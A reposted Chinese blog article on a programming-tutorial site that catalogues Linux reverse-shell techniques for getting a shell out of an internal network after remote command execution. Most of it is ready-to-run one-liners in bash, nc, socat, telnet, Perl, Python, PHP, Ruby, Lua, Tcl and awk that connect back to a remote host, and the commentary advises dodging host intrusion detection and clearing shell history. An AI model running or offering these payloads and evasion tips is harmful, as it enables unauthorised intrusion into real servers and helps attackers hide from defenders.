当前位置:首页 > 文章列表 > 文章 > linux > Linux下内网反弹技巧总结与杂谈

Linux下内网反弹技巧总结与杂谈

来源:Linux就该这么学 2024-12-17 13:19:07 0浏览 收藏

珍惜时间,勤奋学习!今天给大家带来《Linux下内网反弹技巧总结与杂谈》,正文内容主要涉及到等等,如果你正在学习文章,或者是对文章有疑问,欢迎大家关注我!后面我会持续更新相关内容的,希望都能帮到正在学习的大家!

通常,在做渗透的时候会“运气好”,碰到某些应用上存在远程命令执行漏洞,近来由于java反序列化和二进制类漏洞的层出不穷,也加持着这种漏洞越发增多。

一般来说,靠谱点的公司都不会将应用服务器直接对外,而是通过代理转发或映射等方式对外,当可以执行命令的服务器能够访问公网(这个要看具体情况,比如需要加载公网资源或者其他需求)时,反连技巧就会派上用场。

Linux下内网反弹技巧总结与杂谈

反弹技巧总结:

1、NC反弹
Nc 1.1.1.1 8080 -e /bin/bash 
2、Bash-socket反弹
/bin/bash -i > /dev/tcp/1.1.1.1/8080 0<&1 2>&1 
3、Shell-socket反弹
a) exec 2>&0;0<&196;  
exec 196<>/dev/tcp/1.1.1.1/8080;  
 sh <&196 >&196 2>&196  
b) exec 5<>/dev/tcp/1.1.1.1/8080  
cat <&5 | while read line; do $line 2>&5 >&5; done[分两句执行] 
4、文件管道-nc/telnet反弹
a) rm /tmp/f;mkfifo /tmp/f; 
cat /tmp/f|/bin/sh -i 2>&1|nc 1.1.1.1 8080 >/tmp/f 
b) rm /tmp/backpipe; 
mknod /tmp/backpipe p;/bin/bash 0</tmp/backpipe | nc 1.1.1.1 8080 1>/tmp/backpipe 
c) rm /tmp/backpipe; 
mknod /tmp/backpipe p && telnet 1.1.1.1 8080 0</tmp/backpipe | /bin/bash 1>/tmp/backpipe
5、Bash-telnet反弹
telnet 1.1.1.1 8080 | /bin/bash | telnet 1.1.1.1 9090 [另一个端口] 
6、Socat反弹
socat tcp-connect:1.1.1.1:8080 exec:"bash -li",pty,stderr,setsid,sigint,sane 
7、脚本反弹
a) Perl反弹 
1) perl -e 'use Socket;$i="1.1.1.1";$p=8080; 
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); 
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); 
open(STDOUT,">&S");open(STDERR,">&S"); 
exec("/bin/sh -i");};' 
 
2) perl -MIO -e '$p=fork; 
exit,if($p); 
$c=new IO::Socket::INET(PeerAddr,"1.1.1.1:8080"); 
STDIN->fdopen($c,r); 
$~->fdopen($c,w);system$_ while<>;' 
 
b) Python反弹 
python -c 'import socket,subprocess,os; 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); 
s.connect(("1.1.1.1",8080)); 
os.dup2(s.fileno(),0);  
os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); 
p=subprocess.call(["/bin/sh","-i"]);' 
 
c) PHP反弹 
php -r '$sock=fsockopen("1.1.1.1",8080); 
exec("/bin/sh -i < &3 >&3 2>&3");' 
 
d) ruby反弹 
ruby -rsocket -e'f=TCPSocket.open("1.1.1.1",8080).to_i; 
exec sprintf("/bin/sh -i < &%d >&%d 2>&%d",f,f,f)' 
 
2) ruby -rsocket -e 'exit if fork; 
c=TCPSocket.new("1.1.1.1","8080"); 
while(cmd=c.gets); 
IO.popen(cmd,"r") 
{|io|c.print io.read}end' 
 
e) lua反弹 
lua -e "require('socket'); 
require('os'); 
t=socket.tcp(); 
t:connect('1.1.1.1','8080'); 
os.execute('/bin/sh -i < &3 >&3 2>&3');" 
 
f) tcl反弹 
echo 'set s [socket 1.1.1.1 8080]; 
while 42 { puts -nonewline $s "shell>"; 
flush $s; 
gets $s c; 
set e "exec $c"; 
if {![catch {set r [eval $e]} err]}  
{ puts $s $r };  
flush $s; };  
close $s;' | tclsh 
 
g) awk反弹 
awk 'BEGIN {s = "/inet/tcp/0/1.1.1.1/8080"; 
while(42) { do{ printf "shell>" |& s;  
s |& getline c;  
if(c){ while ((c |& getline) > 0) print $0 |& s; 
close(c); } }  
while(c != "exit")  
close(s); }}' /dev/null 
8、二进制程序反弹
Socket程序+命令执行,详见metasploit。

杂谈

   市面上反弹shell的脚本和程序非常多,拿metasploit来说,可以生产上百种shell,但解码以后无非以上几种,有趣的时候metasploit生成的无论是脚本反弹程序还是二进制反弹程序多数都是自己实现了system_call,而不是调用系统bash或命令之类,看来做的还是很良心的。

   值得一提的是,由于大型甲方公司都会有HIDS防护,目前已知的HIDS,要么修改了bash,要么劫持glibc,要么修改系统底层(这种可能性较低,出问题的几率大)。

   当你觉得可以反弹shell的时候一定要提前识别好环境,不然执行了一个bash –i 或nc ,很有可能直接被hids一波带走。

比较推荐使用shell内置反弹或脚本类的反弹shell程序,一般的hids不会记录,非常不建议调用系统bash命令产生反弹,起码.bash_history会妥妥把你出卖掉。

   内网shell反弹无论在渗透还是在反渗透中都是一个绕过不开的话题,关于反弹shell,其中有几个有趣的问题:

1. 反弹shell的理解:

   内网shell反弹的本质是与公网服务器建立连接,并能将公网服务器传输过来的命令执行,并将结果返回,因此反弹shell涉及两个过程网络建立+命令执行,这两个过程都是衡量反弹功能的标准,网络建立要求复杂加密(如msf: meterpreter_reverse_https等),命令执行则要求尽可能绕开hids和相关记录。

2.交互式shell:

   交互式shell是shell最常见的一种,交互式shell区别非交互式shell最大的就是加载了环境变量,交互式shell的使用和在终端terminal中几乎一致。一般来说,远程命令执行反弹出来仅仅是实现了一个非交互式shell。从非交互式shell升级到交互式shell,一个最简单的方式就是用python脚本 pty.spawn(“/bin/bash”)

3. 交互式shell在实际渗透过程中未必比非交互式shell好,因为有经验的甲方都会对环境变量、shell终端加载文件如.bashrc、bash_profile等进行安全处理,直接提升到交互式shell,触发HIDS告警的可能性较高(当然并非绝对)。

(Ps:如果你使用别人的工具,反弹了shell,却不清楚是不是交互式shell,一个简单的方法就是执行history和set命令,如果都有正常返回,那你就要当心了,你可能获取了一个交互式shell,尽快清除history吧。)

理论要掌握,实操不能落!以上关于《Linux下内网反弹技巧总结与杂谈》的详细介绍,大家都掌握了吧!如果想要继续提升自己的能力,那么就来关注golang学习网公众号吧!

版本声明
本文转载于:Linux就该这么学 如有侵犯,请联系study_golang@163.com删除
399元送汇泽平板电脑?399元送汇泽平板电脑?
上一篇
399元送汇泽平板电脑?
探索苹果电脑模拟器:提升开发与体验的理想工具
下一篇
探索苹果电脑模拟器:提升开发与体验的理想工具
查看更多
最新文章
查看更多
课程推荐
  • 前端进阶之JavaScript设计模式
    前端进阶之JavaScript设计模式
    设计模式是开发人员在软件开发过程中面临一般问题时的解决方案,代表了最佳的实践。本课程的主打内容包括JS常见设计模式以及具体应用场景,打造一站式知识长龙服务,适合有JS基础的同学学习。
    542次学习
  • GO语言核心编程课程
    GO语言核心编程课程
    本课程采用真实案例,全面具体可落地,从理论到实践,一步一步将GO核心编程技术、编程思想、底层实现融会贯通,使学习者贴近时代脉搏,做IT互联网时代的弄潮儿。
    508次学习
  • 简单聊聊mysql8与网络通信
    简单聊聊mysql8与网络通信
    如有问题加微信:Le-studyg;在课程中,我们将首先介绍MySQL8的新特性,包括性能优化、安全增强、新数据类型等,帮助学生快速熟悉MySQL8的最新功能。接着,我们将深入解析MySQL的网络通信机制,包括协议、连接管理、数据传输等,让
    497次学习
  • JavaScript正则表达式基础与实战
    JavaScript正则表达式基础与实战
    在任何一门编程语言中,正则表达式,都是一项重要的知识,它提供了高效的字符串匹配与捕获机制,可以极大的简化程序设计。
    487次学习
  • 从零制作响应式网站—Grid布局
    从零制作响应式网站—Grid布局
    本系列教程将展示从零制作一个假想的网络科技公司官网,分为导航,轮播,关于我们,成功案例,服务流程,团队介绍,数据部分,公司动态,底部信息等内容区块。网站整体采用CSSGrid布局,支持响应式,有流畅过渡和展现动画。
    484次学习
查看更多
AI推荐
  • 讯飞AI大学堂免费AI认证证书:大模型工程师认证,提升您的职场竞争力
    免费AI认证证书
    科大讯飞AI大学堂推出免费大模型工程师认证,助力您掌握AI技能,提升职场竞争力。体系化学习,实战项目,权威认证,助您成为企业级大模型应用人才。
    11次使用
  • 茅茅虫AIGC检测:精准识别AI生成内容,保障学术诚信
    茅茅虫AIGC检测
    茅茅虫AIGC检测,湖南茅茅虫科技有限公司倾力打造,运用NLP技术精准识别AI生成文本,提供论文、专著等学术文本的AIGC检测服务。支持多种格式,生成可视化报告,保障您的学术诚信和内容质量。
    156次使用
  • 赛林匹克平台:科技赛事聚合,赋能AI、算力、量子计算创新
    赛林匹克平台(Challympics)
    探索赛林匹克平台Challympics,一个聚焦人工智能、算力算法、量子计算等前沿技术的赛事聚合平台。连接产学研用,助力科技创新与产业升级。
    186次使用
  • SEO  笔格AIPPT:AI智能PPT制作,免费生成,高效演示
    笔格AIPPT
    SEO 笔格AIPPT是135编辑器推出的AI智能PPT制作平台,依托DeepSeek大模型,实现智能大纲生成、一键PPT生成、AI文字优化、图像生成等功能。免费试用,提升PPT制作效率,适用于商务演示、教育培训等多种场景。
    174次使用
  • 稿定PPT:在线AI演示设计,高效PPT制作工具
    稿定PPT
    告别PPT制作难题!稿定PPT提供海量模板、AI智能生成、在线协作,助您轻松制作专业演示文稿。职场办公、教育学习、企业服务全覆盖,降本增效,释放创意!
    161次使用
微信登录更方便
  • 密码登录
  • 注册账号
登录即同意 用户协议隐私政策
返回登录
  • 重置密码